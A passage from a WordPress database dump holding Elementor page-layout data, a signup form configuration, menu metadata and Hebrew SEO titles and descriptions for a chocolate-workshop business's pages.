\\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1888,378,'_elementor_version','0.4'),(1889,378,'_elementor_template_type','post'),(1890,378,'_elementor_controls_usage','a:8:{s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:4;s:11:\"header_size\";i:4;s:5:\"align\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:1:{s:6:\"weight\";i:1;}}s:7:\"content\";a:1:{s:15:\"section_divider\";a:2:{s:5:\"width\";i:1;s:5:\"align\";i:1;}}}}s:5:\"posts\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:3:{s:14:\"section_layout\";a:6:{s:5:\"_skin\";i:1;s:22:\"classic_read_more_text\";i:1;s:18:\"cards_show_excerpt\";i:1;s:15:\"cards_meta_data\";i:1;s:20:\"cards_read_more_text\";i:1;s:17:\"cards_show_avatar\";i:1;}s:13:\"section_query\";a:1:{s:6:\"offset\";i:1;}s:18:\"section_pagination\";a:2:{s:21:\"pagination_prev_label\";i:1;s:21:\"pagination_next_label\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:4;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:10;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}}'),(1892,379,'_menu_item_type','post_type'),(1893,379,'_menu_item_menu_item_parent','0'),(1894,379,'_menu_item_object_id','370'),(1895,379,'_menu_item_object','page'),(1896,379,'_menu_item_target',''),(1897,379,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1898,379,'_menu_item_xfn',''),(1899,379,'_menu_item_url',''),(1928,383,'_menu_item_type','post_type'),(1929,383,'_menu_item_menu_item_parent','0'),(1930,383,'_menu_item_object_id','69'),(1931,383,'_menu_item_object','page'),(1932,383,'_menu_item_target',''),(1933,383,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1934,383,'_menu_item_xfn',''),(1935,383,'_menu_item_url',''),(1937,379,'_elementor_controls_usage','a:0:{}'),(1941,383,'_elementor_controls_usage','a:0:{}'),(1942,384,'_edit_lock','1596644507:1'),(1944,384,'_edit_last','1'),(1945,384,'_yoast_wpseo_title','סדנת שוקולד למבוגרים - כי אין גיל לשוקולד | Cocolate4U'),(1946,384,'_yoast_wpseo_metadesc','סדנת שוקולד למבוגרים נועדה לאלו המחפשים חוויה מתוקה ובלתי נשכחת. סדנאות שוקולד נהפכות לפופולריות מדיי יום ורבים המחפשים חווויה בלתי נשכחת מוצאים אותה בסדנת שוקולד למבוגרים.'),(1947,386,'_edit_lock','1596644583:1'),(1949,386,'_edit_last','1'),(1950,386,'_yoast_wpseo_title','סדנת שוקולד בבית | חוויה ביתית בלתי נשכחת | Chocolate4u'),(1951,386,'_yoast_wpseo_metadesc','שוקולד4U מגיעים עד אליכם עם סדנת שוקולד ביתית. רבים שחיפשו סדנאות שוקולד ויתרו בעקבות מרחק, חוסר זמינות ועוד. היום ניתן ליהנות מסדנת שוקולד בבית שלכם'),(1952,388,'_edit_lock','1596644566:1'),(1954,388,'_edit_last','1'),(1955,388,'_yoast_wpseo_title','הצעת נישואין בסדנת שוקולד – חוויה זוגית שלא תישכח | Chocolate4u'),(1956,388,'_yoast_wpseo_metadesc','הצעת נישואין בסדנת שוקולד היא הפיתרון המושלם להצעת נישואין מקורית ומרגשת. אתם תוכלו לבחור אם להציע בסדנת שוקולד ביתית לאווירה נינוחה ואינטימית או בסטודיו בסדנת שוקולד זוגית רגילה. היכנסו לפרטים נוספים'),(1957,390,'_edit_lock','1596644638:1'),(1959,390,'_edit_last','1'),(1960,390,'_yoast_wpseo_title','סדנת שוקולד משפחתית – חוויה טעימה, מרגשת ומגבשת | Chocolate4u'),(1961,390,'_yoast_wpseo_metadesc','סדנת שוקולד משפחתית מתאימה לכל אירוע, בכל זמן ולכל בני המשפחה– ניתן לשלב אותה בסדנת שוקולד ליום הולדת או כל חגיגה אחרת שתבחרו, משולבים בה אלמנטים מסדנת שוקולד לילדים כך שגם הקטנים ביותר יוכלו לחוות ולהתרגש.'),(1962,392,'_edit_lock','1596644670:1'),(1964,392,'_edit_last','1'),(1965,392,'_yoast_wpseo_title','סדנת שוקולד זוגית ליום האהבה – המתנה המושלמת | Chocolate4u'),(1966,392,'_yoast_wpseo_metadesc','סדנת שוקולד זוגית ליום האהבה היא מתנה מקורית ומרגשת. מכירים כשמנאס ממתנות חומריות שאף אחד לא זוכר? הגיע הזמן לחדש. ניתן לקבל את המתנה גם כסדנאת שוקולד ביתית מבלי לצאת מפתח הדלת.'),(1967,394,'_edit_lock','1596644614:1'),(1969,394,'_edit_last','1'),(1970,394,'_yoast_wpseo_title','סדנת שוקולד כשרה – זיכרון בלתי נשכח | Chocolate4u'),(1971,394,'_yoast_wpseo_metadesc','סדנת שוקולד כשרה מיועדת עבור אנשים שמחפשים חוויה בלתי נשכחת וגם לא רוצים לוותר על שמירת הכשרות. סדנאות שוקולד משאירות חותם מתוק לזיכרון שלא ישכח. היכנסו לפרטים נוספים'),(1972,396,'_edit_lock','1596644633:1'),(1974,396,'_edit_last','1'),(1975,396,'_yoast_wpseo_title','סדנת שוקולד ליום הולדת – חגיגה מקורית וייחודית שכולם ידברו עליה | Chocolate4u'),(1976,396,'_yoast_wpseo_metadesc','סדנת שוקולד ליום הולדת מתאימה לכל אחד – אין גיל לאהבה לשוקולד. בין אם אתם רוצים לפנק את האהובים שלכם בסדנת שוקולד למבוגרים או לארגן אטרקציה בלתי נשכת בסדנת שוקולד לילדים, אפשר בבית, בצימר או בכל מקום אחד.'),(2040,405,'_menu_item_type','post_type'),(2041,405,'_menu_item_menu_item_parent','0'),(2042,405,'_menu_item_object_id','123'),(2043,405,'_menu_item_object','page'),(2044,405,'_menu_item_target',''),(2045,405,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2046,405,'_menu_item_xfn',''),(2047,405,'_menu_item_url',''),(2056,405,'_elementor_controls_usage','a:0:{}'),(2057,386,'_wp_page_template','elementor_header_footer'),(2058,394,'_wp_page_template','elementor_header_footer'),(2059,396,'_wp_page_template','elementor_header_footer'),(2060,384,'_wp_page_template','elementor_header_footer'),(2061,390,'_wp_page_template','elementor_header_footer'),(2062,406,'_wp_page_template','elementor_header_footer'),(2063,406,'_elementor_edit_mode','builder'),(2064,406,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><\\/p>\\n<p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.&nbsp;<\\/p>\\n<h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2>\\n<ul>\\n<li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li>\\n<li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li>\\n<li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li>\\n<li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li>\\n<\\/ul>\\n<p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New 